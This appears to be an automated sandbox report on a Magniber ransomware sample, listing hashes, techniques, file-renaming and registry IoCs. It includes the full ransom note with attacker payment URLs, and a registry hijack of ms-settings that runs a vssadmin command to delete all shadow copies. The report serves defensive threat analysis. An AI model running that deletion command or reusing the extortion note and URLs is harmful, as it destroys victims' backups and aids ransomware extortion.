magniber | a9ac09156b87ab7f92e22205c9a805a1bbe14084fd67d7bf8982e0f1ea221731

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10-en-20211014
submitted
09-11-2021 07:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rrthp.dll
Size

38KB
MD5

ad113aac83ec6568b0ead8e9000c438c
SHA1

28560487f939ae469dfc377cac35f29f27f384eb
SHA256

a9ac09156b87ab7f92e22205c9a805a1bbe14084fd67d7bf8982e0f1ea221731
SHA512

5672e5c1e73a85897bfc0884a704968a03cd92442413cdce3e81665565359290fdbeab7a8b3adb915a3e1fa96bc5f249cd80cc7a48362fbbdbd057896a8f3697

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f8e8723092783e20agihmepi.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gihmepi Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f8e8723092783e20agihmepi.hateme.uno/gihmepi http://f8e8723092783e20agihmepi.oddson.quest/gihmepi http://f8e8723092783e20agihmepi.dearbet.sbs/gihmepi http://f8e8723092783e20agihmepi.legcore.space/gihmepi Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f8e8723092783e20agihmepi.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gihmepi

http://f8e8723092783e20agihmepi.hateme.uno/gihmepi

http://f8e8723092783e20agihmepi.oddson.quest/gihmepi

http://f8e8723092783e20agihmepi.dearbet.sbs/gihmepi

http://f8e8723092783e20agihmepi.legcore.space/gihmepi

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1288	760	cmd.exe	81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	760	cmd.exe	81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3400	760	vssadmin.exe	81

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

rundll32.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\BlockConvert.raw => C:\Users\Admin\Pictures\BlockConvert.raw.gihmepi	rundll32.exe
File renamed	C:\Users\Admin\Pictures\FormatHide.crw => C:\Users\Admin\Pictures\FormatHide.crw.gihmepi	rundll32.exe
File renamed	C:\Users\Admin\Pictures\RestorePush.png => C:\Users\Admin\Pictures\RestorePush.png.gihmepi	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\UndoRemove.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\UndoRemove.tiff => C:\Users\Admin\Pictures\UndoRemove.tiff.gihmepi	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\UnpublishInstall.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\UnpublishInstall.tiff => C:\Users\Admin\Pictures\UnpublishInstall.tiff.gihmepi	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 64 IoCs

Processes:

rundll32.exe

description	pid	Process
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe
PID 3484 set thread context of 0	3484	rundll32.exe

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
3400	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge_iecompat:"
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IEFlipAheadCache"
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheRe = "MicrosoftEdge\\IECompatCache"
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheLi = "1"
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1d7544fce8c2d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 25b0743d06c1d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "256"
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheRepair = "0"
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5dd665fce8c2d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 13871412e9c2d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000af5bff59b70790d925dea4cce0c3810427d348b65871caaeb432f10dea1aea7facde57ff081e96353abcbc95edce7fc8f8d203e22612ce41aa6f759ac103ed69c8425873a0919da830812fa2361e3bfc5e0350a25b201fb9b46549aa76c216086528fe990b82d2e598cf75bc38d3ce921b05872972bb48606db46aa77c75133a4f2e7782d60fffab41470526000d1005c3776ee37a03506d3cfc248ca33d4b3b76f5f803105ad4f5d287f495feebef0958fbcd54c718ac570edd42dd483b65b6a81d3566cb81ecfa2631e217f68fdc985230140ecc1afe0208f7ed2e658d743bf646dd1b2ca6beff3be323b91d18fb3ffab530b09229b0b40deace399c5419f7ef10288ff6e777f5e13eb81754a678c6132cf2fca065b9dfda55598593b038c1391c82f917662fee2ee33bc88b587022663431f8d1eedab9bcda5d9a4fc2387800083d513b424b57c2705492d150e6bdd06c801efee400a6b718ddcb07a884ad41751240c19adf0e5487084103adc1093e76e1a5d767636edfaff68cce8326a4fc036c326390ce41e2c61d013d8ff96301f106ccb4971f47c67d083061069de2d3353d49ad26	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua\Cache = "MicrosoftEdge\\IECompatUaCache"
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities\001 = 53002d0031002d00310035002d0033002d003100000053002d0031002d00310035002d0033002d003900000053002d0031002d00310035002d0033002d0033003200310035003400330030003800380034002d0031003300330039003800310036003200390032002d00380039003200350037003600310036002d003100310034003500380033003100300031003900000053002d0031002d00310035002d0033002d003700380037003400340038003200350034002d0031003200300037003900370032003800350038002d0033003500350038003600330033003600320032002d003100300035003900380038003600390036003400000053002d0031002d00310035002d0033002d0033003800340035003200370033003400360033002d0031003300330031003400320037003700300032002d0031003100380036003500350031003100390035002d003100310034003800310030003900390037003700000053002d0031002d00310035002d0033002d0031003000320034002d0031003000360035003300360035003900330036002d0031003200380031003600300034003700310036002d0033003500310031003700330038003400320038002d0031003600350034003700320031003600380037002d003400330032003700330034003400370039002d0033003200330032003100330035003800300036002d0034003000350033003200360034003100320032002d003300340035003600390033003400360038003100000053002d0031002d00310035002d0033002d0031003000320034002d0033003600320033003800350035003000340031002d0031003800320036003900390039003900350036002d0033003700340037003000360039003800310038002d0033003500320035003200360030003200320033002d0033003700340037003300370034003500310030002d0031003700340036003200370032003600320034002d003900350030003600300031003100360038002d0035003600350035003600330033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400300035003400340033003400380039002d003800370034003000330036003100320032002d0034003200380036003000330035003500350035002d0031003800320033003900320031003500360035002d0031003700340036003500340037003400330031002d0032003400350033003800380035003400340038002d0033003600320035003900350032003900300032002d00390039003100360033003100320035003600000053002d0031002d00310035002d0033002d0031003000320034002d0031003500300032003800320035003100360036002d0031003900360033003700300038003300340035002d0032003600310036003300370037003400360031002d0032003500360032003800390037003000370034002d0034003100390032003000320038003300370032002d0033003900360038003300300031003500370030002d0031003900390037003600320038003600390032002d003100340033003500390035003300360032003200000053002d0031002d00310035002d0033002d0031003000320034002d0033003200300033003300350031003400320039002d0032003100320030003400340033003700380034002d0032003800370032003600370030003700390037002d0031003900310038003900350038003300300032002d0032003800320039003000350035003600340037002d0034003200370035003700390034003500310039002d003700360035003600360034003400310034002d003200370035003100370037003300330033003400000053002d0031002d00310035002d0033002d0031003000320034002d0031003700380038003100320039003300300033002d0032003100380033003200300038003500370037002d0033003900390039003400370034003200370032002d0033003100340037003300350039003900380035002d0031003700350037003300320032003100390033002d0033003800310035003700350036003300380036002d003100350031003500380032003100380030002d003100380038003800310030003100310039003300000053002d0031002d00310035002d0033002d0031003000320034002d0033003100350033003500300039003600310033002d003900360030003600360036003700360037002d0033003700320034003600310031003100330035002d0032003700320035003600360032003600340030002d00310032003100330038003200350033002d003500340033003900310030003200320037002d0031003900350030003400310034003600330035002d003400310039003000320039003000310038003700000053002d0031002d00310035002d0033002d0031003000320034002d003100320036003000370038003500390033002d0033003600350038003600380036003700320038002d0031003900380034003800380033003300300036002d003800320031003300390039003600390036002d0033003600380034003000370039003900360030002d003500360034003000330038003600380030002d0033003400310034003800380030003000390038002d003300340033003500380032003500320030003100000053002d0031002d00310035002d0033002d0031003000320034002d0031003600390032003900370030003100350035002d0034003000350034003800390033003300330035002d003100380035003700310034003000390031002d0033003300360032003600300031003900340033002d0033003500320036003500390033003100380031002d0031003100350039003800310036003900380034002d0032003100390039003000300038003500380031002d00340039003700340039003200390039003100000053002d0031002d00310035002d0033002d0031003000320034002d003200320030003000320032003700370030002d003700300031003200360031003900380034002d0033003900390031003200390032003900350036002d0034003200300038003700350031003000320030002d0032003900310038003200390033003000350038002d0033003300390036003400310039003300330031002d0031003700300030003900330032003300340038002d003200300037003800330036003400380039003100000053002d0031002d00310035002d0033002d0031003000320034002d003500320038003100310038003900360036002d0033003800370036003800370034003300390038002d003700300039003500310033003500370031002d0031003900300037003800370033003000380034002d0033003500390038003200320037003600330034002d0033003600390038003700330030003000360030002d003200370038003000370037003700380038002d003300390039003000360030003000320030003500000053002d0031002d00310035002d0033002d0031003000320034002d0031003800360034003100310031003700350034002d003700370036003200370033003300310037002d0033003600360036003900320035003000320037002d0032003500320033003900300038003000380031002d0033003700390032003400350038003200300036002d0033003500380032003400370032003400330037002d0034003100310034003400310039003900370037002d003100350038003200380038003400380035003700000053002d0031002d00310035002d0033002d0031003000320034002d0034003000340034003800330035003100330039002d0032003600350038003400380032003000340031002d0033003100320037003900370033003100360034002d003300320039003200380037003200330031002d0033003800360035003800380030003800360031002d0031003900330038003600380035003600340033002d003400360031003000360037003600350038002d003100300038003700300030003000340032003200000053002d0031002d00310035002d0033002d0031003000320034002d0032003900320032003200390036003200360031002d0031003600340037003400380032003700360038002d0032003000310037003000390031003100340036002d0033003800350038003600360037003000360038002d0034003100330035003600360033003600360032002d0032003900330031003900380035003800390034002d0031003600320037003800320030003900320035002d0038003100380033003600360034003300310000000000
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "0"
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 25b0743d06c1d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cach = "MicrosoftEdge\\IEFlipAheadCache"
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\User\\Default\\EmieSiteList"
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen
